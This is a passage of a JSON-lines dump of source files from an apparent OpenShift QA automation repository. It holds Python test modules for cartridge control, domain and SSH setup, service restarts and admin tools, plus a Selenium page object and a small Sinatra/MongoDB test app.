__name__ == '__main__':\n execute()\n" }, { "alpha_fraction": 0.47417041659355164, "alphanum_fraction": 0.4806126058101654, "avg_line_length": 44.70000076293945, "blob_id": "0bc307c16f25921001e672d897fdfa9b7c4f4549", "content_id": "d16bc7151f283f74d5ff001bae7876c3b171e157", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8227, "license_type": "no_license", "max_line_length": 102, "num_lines": 180, "path": "/automation/open/testmodules/RT/cartridge/postgresql_control_embedded_cartridge.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nAttila Nagy\[email protected]\nFeb 9, 2012\n\n[US1386][Runtime][cartridge]Control embedded PostgreSQL\nhttps://tcms.engineering.redhat.com/case/128839/\n\"\"\"\n\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info ('[US1386][Runtime][cartridge]Control embedded PostgreSQL')\n try:\n test_name = self.get_variant()\n except:\n self.info(\"Missing variant, used `php` as default\")\n test_name = 'php'\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n self.app_type = common.app_types[test_name]\n self.app_name = test_name.split('-')[0]+common.get_random_string(7)\n common.env_setup()\n\n\n def finalize(self):\n pass\n\n\nclass PostgresqlControlEmbededCartridge(OpenShiftTest):\n def test_method(self):\n if self.scalable:\n self.add_step(\"Creating a scalable application\",\n common.create_scalable_app,\n function_parameters = [self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n True],\n expect_description = 'The app should be created successfully',\n expect_return = 0)\n else:\n self.add_step(\"Creating an application\",\n common.create_app,\n function_parameters = [self.app_name,\n self.app_type,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n True],\n expect_description = 'The app should be created successfully',\n expect_return = 0)\n\n self.add_step('Embedding PostgreSQL to the application',\n common.embed,\n function_parameters = [self.app_name, \n 'add-%s' % ( common.cartridge_types['postgresql']), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description = 'PostgreSQL 8.4 cartridge should be embedded successfully',\n expect_return = 0)\n\n self.add_step('Ensuring the right status message of the started instance',\n \"rhc cartridge status %s -a %s -l %s -p '%s' %s\"% (\n common.cartridge_types['postgresql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'PostgreSQL 8.4 should be started',\n expect_str = ['Postgres is running'])\n\n if self.scalable:\n self.add_step('Scale up',\n common.scale_up,\n function_parameters= [self.app_name],\n expect_return = 0)\n\n self.add_step('Ensuring the right status message of the started instance',\n 'rhc cartridge status %s -a %s -l %s -p %s %s'% (\n common.cartridge_types['postgresql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'PostgreSQL 8.4 should be started',\n expect_str = ['Postgres is running'])\n\n self.add_step('Inject app with ENV page',\n common.inject_app_index_with_env,\n function_parameters = [self.app_name, self.app_type],\n expect_return = 0)\n\n 
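# get_num_of_gears_by_web presumably reports the gear count via the ENV page injected above; 2 gears are expected once the scale-up completes\n            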
self.add_step('Ensuring the right number of gears used',\n                common.get_num_of_gears_by_web,\n                function_parameters = [self.app_name, self.app_type],\n                expect_description = 'PostgreSQL 8.4 should have 2 gears',\n                )\n            #expect_return = 2)\n\n        self.add_step('Stopping PostgreSQL',\n            "rhc cartridge stop %s -a %s -l %s -p '%s' %s"% (\n                common.cartridge_types['postgresql'],\n                self.app_name,\n                self.config.OPENSHIFT_user_email, \n                self.config.OPENSHIFT_user_passwd,\n                common.RHTEST_RHC_CLIENT_OPTIONS),\n            expect_description = 'PostgreSQL 8.4 should be stopped',\n            expect_return = 0)\n\n        self.add_step('Ensuring the right status message of the stopped instance',\n            "rhc cartridge status %s -a %s -l %s -p %s %s" % (\n                common.cartridge_types['postgresql'],\n                self.app_name,\n                self.config.OPENSHIFT_user_email, \n                self.config.OPENSHIFT_user_passwd,\n                common.RHTEST_RHC_CLIENT_OPTIONS),\n            expect_description = 'PostgreSQL 8.4 should be stopped',\n            expect_str = ['Postgres is stopped'])\n\n        self.add_step('Restarting PostgreSQL',\n            'rhc cartridge restart %s -a %s -l %s -p %s %s'% (\n                common.cartridge_types['postgresql'],\n                self.app_name,\n                self.config.OPENSHIFT_user_email, \n                self.config.OPENSHIFT_user_passwd,\n                common.RHTEST_RHC_CLIENT_OPTIONS),\n            expect_description = 'PostgreSQL 8.4 should be started',\n            expect_return = 0)\n\n        self.add_step('Ensuring the right status message of the started instance',\n            "rhc cartridge status %s -a %s -l %s -p '%s' %s"% (\n                common.cartridge_types['postgresql'],\n                self.app_name,\n                self.config.OPENSHIFT_user_email, \n                self.config.OPENSHIFT_user_passwd,\n                common.RHTEST_RHC_CLIENT_OPTIONS),\n            expect_description = 'PostgreSQL 8.4 should be started',\n            expect_str = ['Postgres is running'])\n\n        if self.scalable:\n            self.add_step('Ensuring the right number of gears used',\n                common.get_num_of_gears_by_web,\n                function_parameters = [self.app_name, self.app_type],\n                expect_description = 'PostgreSQL 8.4 should have 2 gears',\n                expect_return = 2)\n\n        self.add_step('Removing PostgreSQL cartridge',\n            "rhc cartridge remove %s -a %s -l %s -p '%s' --confirm %s"% (\n                common.cartridge_types['postgresql'],\n                self.app_name,\n                self.config.OPENSHIFT_user_email, \n                self.config.OPENSHIFT_user_passwd,\n                common.RHTEST_RHC_CLIENT_OPTIONS),\n            expect_description = 'The PostgreSQL cartridge should be removed',\n            expect_return = 0)\n\n        self.run_steps()\n        return self.passed("%s passed" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(PostgresqlControlEmbededCartridge)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.623711347579956, "alphanum_fraction": 0.626288652420044, "avg_line_length": 27.696428298950195, "blob_id": "efbd7385b21470903204955571292949e0fe71c7", "content_id": "90fc3012acfdf262c5b008523825005d39ff692b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1552, "license_type": "no_license", "max_line_length": 78, "num_lines": 56, "path": "/automation/Example/pages/homepage.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nHome page abstraction.\n\nAuthor: Xin Gao <[email protected]>\n\"\"\"\n\n\nfrom selenium.common import exceptions as SeleniumEx\nfrom hta2.core import PageObject\nfrom hta2.tests.bugzilla.webui.ui_mapping import homepage as homepage_ui\nimport hta2.lib.selenium.ui.exceptions as 
ex\n\n\nclass HomePage(PageObject):\n \"\"\"\n Home page abstraction class.\n Parameters:\n * _location - initial URL to load upon instance creation\n \"\"\"\n _location = homepage_ui.location\n _model = homepage_ui.header\n _label = \"Bugzilla home page\"\n\n def init_validation(self):\n \"\"\"\n Check that user is logged in ('Sign Out' link is present).\n Return: True - success\n \"\"\"\n try:\n self.login_link\n except SeleniumEx.NoSuchElementException:\n raise ex.InitPageValidationError('This is not home page: %s' % ex)\n return True\n\n\n def login(self, username='[email protected]', password='redhat'):\n \"\"\"\n Parameters:\n * username - username\n * password - password\n Return: HomePage instance\n Throws: InitPageValidationError - all login failure scenarios failed\n \"\"\"\n #self.fill_form_values(username=username, password=password)\n self.login_link.click()\n self.username_input.send_keys(username)\n self.password_input.send_keys(password)\n self.login_btn.click()\n\n\n def open_admin_page(self):\n \"\"\"\"\"\"\n admin_url = homepage_ui.admin_url\n self._driver.get(admin_url)\n #import time\n #time.sleep(5)\n\n" }, { "alpha_fraction": 0.5815739035606384, "alphanum_fraction": 0.5856525897979736, "avg_line_length": 31.310077667236328, "blob_id": "f5dec709f16adf29934fb292ed0b909a5e18b193", "content_id": "3c5bafaed8c14f0b5173b93d7cab7fc6b4edca94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4168, "license_type": "no_license", "max_line_length": 91, "num_lines": 129, "path": "/automation/open/testmodules/RT/job_related/create_domain.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport common\nimport rhtest\nimport glob\nimport openshift\nimport shutil\nimport helper\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n etc_dir = common.get_etc_dir()\n common.env_setup()\n self.domain_name = common.getRandomString(10)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.key_files = \"%s/libra_key/id_rsa*\" %(etc_dir)\n if self.get_run_mode() == \"OnPremise\":\n self.pem_file = \"%s/onpremise/onpremise.pem\" %(etc_dir)\n else:\n self.pem_file = \"%s/libra.pem\" %(etc_dir)\n self.max_gears = common.DEV_MAX_GEARS\n\n cf = self.config\n self.rest = cf.rest_api\n\n def finalize(self):\n pass\n\n\nclass SetupSSH(OpenShiftTest):\n def test_method(self):\n if not os.path.exists(os.path.expanduser(\"~/.ssh/id_rsa.pub\")):\n # only copy the pre-configured id_rsa if one does not exist\n self.info(\"Copy already prepared libra ssh key file\")\n try:\n shutil.os.makedirs(os.path.expanduser(\"~/.ssh/\"))\n except:\n pass\n for filename in glob.glob(self.key_files):\n shutil.copy(filename, os.path.expanduser(\"~/.ssh/\"))\n os.chmod(os.path.join(os.path.expanduser(\"~/.ssh/\"), filename),\n 0400)\n \n #common.prepare_libra_sshkey()\n #common.clean_up(user_email, user_passwd)\n if not os.path.exists(os.path.join(os.path.expanduser(\"~/.ssh/\"),\n os.path.basename(self.pem_file))):\n shutil.copy(self.pem_file, os.path.expanduser(\"~/.ssh/\"))\n self.info(\"Change permission of %s to 600\" %(self.pem_file))\n os.chmod(self.pem_file, 0600)\n\n #helper.setup_ssh_config()\n\n self.info(\"Remove ssh known hosts in case host key changes\")\n path = os.path.expanduser(\"~/.ssh/known_hosts\")\n if os.path.exists(path):\n 
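# a cached host key from a previous deployment would make ssh fail host-key verification, so the file is removed up front\n            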
os.remove(path)\n \n self.info(\"Remove 'default' ssh key for user\")\n self.rest.key_delete('default')\n\n self.info(\"Add ssh key\")\n status, resp = self.rest.key_add({})\n import json\n jresp = json.loads(resp)\n status = jresp['status']\n print status\n self.assert_equal(status, 'created', \"Failed to add/update ssh key for user\")\n \n '''\n self.info(\"Update 'default' ssh key for user\")\n status, resp = self.rest.key_update({})\n '''\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass SetupEnv(OpenShiftTest):\n def test_method(self):\n if self.get_run_mode() == 'DEV' or self.get_run_mode() == 'OnPremise':\n self.info(\"Set max gears to %s\" % (self.max_gears))\n ret = common.set_max_gears(self.user_email, self.max_gears)\n self.assert_equal(ret, 0, \"Failed to set max gears\")\n\n #if common.is_multinode_env():\n # common.setup_multi_node_env()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass CreateDomain(OpenShiftTest):\n def test_method(self):\n\n self.info(\"Create/Alter domain for express user\")\n\n try:\n status, res = self.rest.domain_get()\n except openshift.OpenShiftNullDomainException:\n status, res = self.rest.domain_create(self.domain_name)\n self.assert_equal(status, 201, \"Domain should be created/altered successfully\")\n #else:\n #we don't need to update domain! (it's enough if exists)\n # #altering\n # status, ret = self.rest.domain_update(self.domain_name)\n\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SetupSSH)\n #suite.add_test(SetupEnv)\n suite.add_test(CreateDomain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6191696524620056, "alphanum_fraction": 0.6309584975242615, "avg_line_length": 39.64583206176758, "blob_id": "9937f1d39c00cf4f36b0e25396a9e875b471c088", "content_id": "31683755a1caae7cf1af20ab553cbbeb5a714c0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1951, "license_type": "no_license", "max_line_length": 208, "num_lines": 48, "path": "/automation/open/testmodules/RT/cartridge/app_template/mongodb/ruby/config.ru", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "require 'rubygems'\nrequire 'bundler'\nrequire 'mongo'\n\nBundler.require\n\n\nget '/' do\n \"Welcome to OpenShift\\n\"\nend\n\nget '/mongo' do\n action = request.params().fetch(\"action\", \"\")\n size = request.params().fetch(\"size\", \"500000\")\n conn = Mongo::Connection.new(ENV['OPENSHIFT_MONGODB_DB_HOST'], ENV['OPENSHIFT_MONGODB_DB_PORT'])\n db = conn.db(ENV['OPENSHIFT_APP_NAME'])\n auth = db.authenticate(ENV['OPENSHIFT_MONGODB_DB_USERNAME'], ENV['OPENSHIFT_MONGODB_DB_PASSWORD'])\n if auth == false\n response_body = [200, \"Mongo authentication failed\"]\n conn.close\n return response_body\n end\n coll = db.collection(\"info\")\n if action == \"insert\"\n for i in 1..size.to_i()\n doc = {\"data\" => \"This is testing data for testing snapshoting and restoring big data in mongodb database.This is testing data for testing snapshoting and restoring big data in mongodb database.\"}\n coll.insert(doc)\n end\n response_body = [200, \"Gear DNS: #{ENV['OPENSHIFT_GEAR_DNS']}<br />\" + size + \" records have been inserted into mongodb<br />\"]\n elsif action == \"delete\"\n coll.remove\n response_body = [200, \"Gear DNS: #{ENV['OPENSHIFT_GEAR_DNS']}<br />All the records 
have been deleted from mongodb database<br />\"]\n elsif action == \"show\"\n count = coll.count\n if count == 0\n response_body = [200, \"Gear DNS: #{ENV['OPENSHIFT_GEAR_DNS']}<br />There is no record in database<br />\"]\n else\n doc = coll.find_one\n response_body = [200, \"Gear DNS: #{ENV['OPENSHIFT_GEAR_DNS']}<br />There are \" + count.to_s + \" records in database<br />Here's one record: #{doc['data']}\"]\n end\n else\n response_body = \"[rhc-cartridge]snapshot/restore big mysql data to existing app<br />[rhc-cartridge]snapshot/restore big mysql data to new app<br />\"\n end\n conn.close\n return response_body\nend\n\nrun Sinatra::Application\n" }, { "alpha_fraction": 0.6447721123695374, "alphanum_fraction": 0.6722519993782043, "avg_line_length": 24.70689582824707, "blob_id": "3cc7f5eed9ac2b90a927db4a3ac38b487e143825", "content_id": "150a8ff23699f40a628d8d2d03aa4b3e3776c2e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1492, "license_type": "no_license", "max_line_length": 267, "num_lines": 58, "path": "/automation/open/testmodules/UI/web/case_174333.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_174333.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckEapInTechnologyPage(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.go_to_home()\n web.click_element_by_link_text(\"DEVELOPERS\")\n web.click_element_by_link_text(\"Platform Features\")\n \n #check whether the EAP is added in this page.\n web.assert_element_present_by_link_text(\"JBoss Enterpise Application Platform 6.0\") \n web.assert_text_equal_by_xpath('''Market-leading open source enterprise platform for next-generation, highly transactional enterprise Java applications. 
Build and deploy enterprise Java in the cloud.''','''//div[@id='node-10863']/div/table/tbody/tr/td[2]''') \n \n\n self.tearDown()\n\n return self.passed(\" case_174333--CheckEapInTechnologyPage passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckEapInTechnologyPage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_174333.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6985294222831726, "alphanum_fraction": 0.7132353186607361, "avg_line_length": 23.285715103149414, "blob_id": "c8d8e89139f97f75ce4779a2934d87e713ac6b8d", "content_id": "72a4ea7f2a011b6399dc9e3b7ec7d55169ed6862", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 680, "license_type": "no_license", "max_line_length": 107, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbosseap_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 1, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom jbosseap_without_jenkins import EAPHotDeployWithoutJenkins\n\nclass EAPHotDeployWithJenkins(EAPHotDeployWithoutJenkins):\n def __init__(self, config):\n EAPHotDeployWithoutJenkins.__init__(self, config)\n self.config.jenkins_is_needed = True\n self.config.summary = \"[US2443] Hot deployment support for application - with Jenkins - Jboss-eap6\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EAPHotDeployWithJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5269988179206848, "alphanum_fraction": 0.538122832775116, "avg_line_length": 29.595745086669922, "blob_id": "662bd46f09b162fa16e70cde491f7c3da7c43989", "content_id": "212724f25bc49e5a289cc2acb101ae61009ba2a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4315, "license_type": "no_license", "max_line_length": 104, "num_lines": 141, "path": "/automation/open/testmodules/RT/node/apps_when_libra_service_restart.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: apps_when_libra_service_restart.py\n# Date: 2012/03/06 15:51\n# Author: [email protected]\n#\n\nimport re\nimport rhtest\nimport common\nimport OSConf\n\n\nclass OpenShiftTest(rhtest.Test):\n ITEST=\"DEV\"\n\n def initialize(self):\n self.info(\"[rhc-node] All created applications will restart when restart libra service as root\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(7)\n self.num_apps = 2\n try:\n self.app_type = self.get_variant()\n except:\n self.app_type = 'php'\n common.env_setup()\n\n def finalize(self):\n #put back original init.d script\"\n common.run_remote_cmd_as_root(\"mv -f /etc/init.d/libra.O /etc/init.d/libra\" )\n\n\nclass AppsWhenLibraServiceRestart(OpenShiftTest):\n def test_method(self):\n\n for i in range(self.num_apps):\n self.add_step(\"Create an app#%s\"%i,\n common.create_app,\n expect_description = \"App should be created successfully.\",\n function_parameters=[\"%s%s\"%(self.app_name,i), \n common.app_types[self.app_type], \n 
self.user_email, self.user_passwd, False],\n                expect_return=0)\n        \n        #modify /etc/init.d/libra to sleep 10 between stop and start\n        self.add_step(\n            "Edit /etc/init.d/libra to add 'sleep 10' between stopuser and startuser",\n            self.modify_init_libra,\n            expect_description = "Editing should be completed.",\n            expect_return=0)\n\n        self.add_step("Restart libra service",\n            self.restart_libra,\n            expect_description = "Restarting should work",\n            expect_return=0)\n\n        self.add_step("Check the number of restarting processes",\n            self.check_res,\n            expect_description = "There should be APPS=%s string found"%self.num_apps,\n            expect_return=0)\n\n        self.run_steps()\n        return self.passed("%s passed" % self.__class__.__name__)\n\n\n    def modify_init_libra(self):\n        cmd = """rm -f /etc/init.d/libra.O; cp /etc/init.d/libra /etc/init.d/libra.O ; sed -i '\n/restartuser)/ {\nN\n/stopuser/a sleep 10\n}' /etc/init.d/libra && echo OK\n"""\n        (status, output) = common.run_remote_cmd(None, cmd, as_root=True)\n        obj = re.search(r"OK", output)\n        if status==0 and obj:\n            return 0\n        else:\n            return 1 \n\n    def restart_libra(self):\n        cmd ='''\ncat <<'EOF' >/root/restart_libra.sh &&\n#!/bin/sh\n\n#nohup just doesn't work...:(\n#nice nohup /etc/init.d/libra restart </dev/null &\n( /etc/init.d/libra restart >/tmp/LOG 2>&1 ) &\n\n\nexit 0\nEOF\nchmod +x /root/restart_libra.sh; /root/restart_libra.sh 2>&1 & exit 0'''\n        (status, output) = common.run_remote_cmd(None,cmd , True)\n        return status\n\n    def check_res(self):\n        uuid = []\n        for i in range(self.num_apps):\n            uuid.append(OSConf.get_app_uuid("%s%s"%(self.app_name,i)))\n\n        cmd = [\n            "sleep 0.5",\n            "ps -ef",\n            "grep '/bin/bash /etc/init.d/libra restartuser'",\n            "grep -v grep >>/tmp/.abc"]\n\n        cmd2 = ["cat /tmp/.abc ",\n            "egrep '%s'"%("|".join(uuid)),\n            "sort -k 6",\n            "uniq -f 6",\n            """awk '{lines++}END{print "APPS=" lines}'"""]\n        (status, output) = common.run_remote_cmd_as_root(\n            "rm -rf /tmp/.abc "\n            + " ; "\n            + " for i in `seq 0 120`; do "+"|".join(cmd)+";done "\n            + " ; "\n            + "|".join(cmd2)\n            + ";rm -f /tmp/.abc"\n            )\n        obj = re.search(r"APPS=%s"%self.num_apps, output)\n        if status==0 and obj:\n            return 0\n        else: \n            return 1\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(AppsWhenLibraServiceRestart)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# end of apps_when_libra_service_restart.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5327300429344177, "alphanum_fraction": 0.540723979473114, "avg_line_length": 41.5, "blob_id": "e5bae3f0e9691177b195a899dd9c9a173cc84", "content_id": "9947ee3c83002e589c54b1ec89a483e7e48f5d4c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6630, "license_type": "no_license", "max_line_length": 149, "num_lines": 156, "path": "/automation/open/testmodules/RT/node/rhc_admin_domain_info.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\nimport re\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n    ITEST = 'DEV'\n\n    def initialize(self):\n        self.user_email = self.config.OPENSHIFT_user_email\n        self.user_passwd = 
self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(10)\n self.app_name2 = common.getRandomString(10)\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'php'\n tcms_testcase_id = 125898\n self.domain_info_cmd=\"rhc-domain-info -l %s -p %s\"%(self.user_email, self.user_passwd)\n\n \tcommon.env_setup()\n\n def finalize(self):\n try:\n os.system(\"rm -rf %s; rm -rf %s\" % (self.app_name, self.app_name2))\n common.destroy_app(self.app_name)\n common.destroy_app(self.app_name2)\n except:\n pass\n\nclass RhcAdminDomainInfo(OpenShiftTest):\n def test_method(self):\n\n self.info(\"[US1443][BusinessIntegration]Admin Tools: rhc-get-user-info\")\n#1. Create 2 or more apps for user1 and some apps for user2.\n (testcase.TestCaseStep(\"Create an app1\",\n common.create_app,\n function_parameters=[self.app_name, common.app_types[self.app_type], self.user_email, self.user_passwd, False],\n expect_return=0)).run()\n\n (testcase.TestCaseStep(\"Create an app2\",\n common.create_app,\n function_parameters=[self.app_name2, common.app_types[self.app_type], self.user_email, self.user_passwd, False],\n expect_return=0)).run()\n\n#2. Use admin tool to get app list of user1. \n\n (testcase.TestCaseStep(\"rhc-domain-info -l\",\n self.run_n_check_remote_cmd_root,\n function_parameters=[self.domain_info_cmd, [self.app_name, self.app_name2]],\n expect_return=0)).run()\n\n#3. Compare the list got from step2 with the one generated by rhc-domain-info on the client side. \n\n (testcase.TestCaseStep(\"Local rhc-domain-info -l\",\n \"rhc-domain-info -l %s -p %s\"%(self.user_email, self.user_passwd),\n expect_string_list=[self.app_name, self.app_name2],\n expect_return=0)).run()\n\n#4. Add some aliases to the app and get app list of user1 using admin tool.\n\n cmd=\"rhc-ctl-app -a %s -c add-alias --alias 'test.com' -l %s -p %s \"%(self.app_name, self.user_email, self.user_passwd)\n (testcase.TestCaseStep(\"Add alias\",\n self.run_n_check_remote_cmd_root,\n function_parameters=[cmd,\"Success\"],\n expect_return=0)).run()\n\n (testcase.TestCaseStep(\"rhc-domain-info -l\",\n self.run_n_check_remote_cmd_root,\n function_parameters=[self.domain_info_cmd, \"Aliases: test.com\"],\n expect_return=0)).run()\n\n#5. Embed mysql(or phpmyadmin,jenkins client) to the app and get app list of user1 using admin tool. \n\n cmd=\"rhc-ctl-app -a %s -e add-%s -l %s -p %s\"%(self.app_name, common.cartridge_types['postgresql'], self.user_email, self.user_passwd)\n (testcase.TestCaseStep(\"Embed with postgresql\",\n self.run_n_check_remote_cmd_root,\n function_parameters=[cmd, \"PostgreSQL.*database added.\"],\n expect_return=0)).run()\n\n (testcase.TestCaseStep(\"rhc-domain-info -l\",\n self.run_n_check_remote_cmd_root,\n function_parameters = [self.domain_info_cmd, [common.cartridge_types[\"postgresql\"], \"Connection URL: postgresql\"]],\n expect_return=0)).run()\n\n#6. Destroy the apps using client tools and get app list of user1 using admin tool. 
\n\n        cmd="rhc-ctl-app -a %s -c destroy -l %s -p %s -b"%(self.app_name, self.user_email, self.user_passwd)\n        (testcase.TestCaseStep("Destroy the apps using client tools",\n                self.run_n_check_remote_cmd_root,\n                function_parameters=[cmd, "Success"],\n                expect_return=0)).run()\n\n        step=testcase.TestCaseStep("rhc-domain-info -l",\n                self.run_n_check_remote_cmd_root,\n                function_parameters=[self.domain_info_cmd, None, self.app_name],\n                expect_return=0)\n        (retcode, output) = step.run()\n\n        if retcode==0:\n            return self.passed("%s passed" % self.__class__.__name__)\n        else:\n            return self.failed("%s failed" % self.__class__.__name__)\n\n    def run_n_check_remote_cmd_root(self, cmd, expect_str=None, unexpect_str=None):\n        (status, output) = common.run_remote_cmd(None, cmd, True)\n        if expect_str != None and isinstance(expect_str, str):\n            obj = re.search(r"%s"%expect_str, output)\n            if (obj):\n                return 0\n            else:\n                return 1\n        elif expect_str != None and isinstance(expect_str, list):\n            for s in expect_str: #check all\n                obj = re.search(r"%s"%s, output)\n                if obj==None:\n                    print "ERROR: Unable to find %s in output"%s\n                    return 1\n        elif expect_str == None and unexpect_str!=None and isinstance(unexpect_str, str):\n            obj = re.search(r"%s"%unexpect_str, output)\n            if (obj):\n                return 1 #fail\n            else:\n                return 0\n        elif expect_str == None and unexpect_str!=None and isinstance(unexpect_str, list):\n            for s in unexpect_str: #check all\n                obj = re.search(r"%s"%s, output)\n                if obj!=None:\n                    print "ERROR: Found unexpected string %s in output"%s\n                    return 1\n\n        return status\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(RhcAdminDomainInfo)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.6370370388031006, "alphanum_fraction": 0.6370370388031006, "avg_line_length": 23.10714340209961, "blob_id": "d4a0984b084082c1adc2b5084ae2a9e5acdcd1e2", "content_id": "c537a6cac3d665577a1d7b53f286e0c2944486a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 675, "license_type": "no_license", "max_line_length": 105, "num_lines": 28, "path": "/open_automation/bin/shutdown_instance.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport sys\nfile_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = os.path.abspath(file_path + \"/../lib\")\nsys.path.append(lib_path)\nfrom helper import *\n\n\n\ndef main():\n    usage = \"\"\"\nusage: %s -n instance_name\n\"\"\" %(os.path.basename(__file__))\n\n    from optparse import OptionParser\n    parser = OptionParser(usage=usage)\n    parser.add_option(\"-n\", \"--instance_name\", dest=\"instance_name\", help=\"shut down specified instance\")\n\n    (options, args) = parser.parse_args()\n    #print \"-->\", options\n    #print \"-->\", args\n    shutdown_node(options.instance_name)\n\n\nif __name__ == \"__main__\":\n    exit_code=main()\n    sys.exit(exit_code)\n" }, { "alpha_fraction": 0.6680418848991394, "alphanum_fraction": 0.6743890643119812, "avg_line_length": 43.38028335571289, "blob_id": "3f08e649e59edd2614ecbee998e8652f4072dd63", "content_id": "f7c6ca837ac80d22cd28d2116cad73e391d34012", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3151, "license_type": "no_license", "max_line_length": 107, "num_lines": 71, "path": "/automation/open/testmodules/UI/web/US1797_135711.py", "repo_name": "fdumpling/practices", 
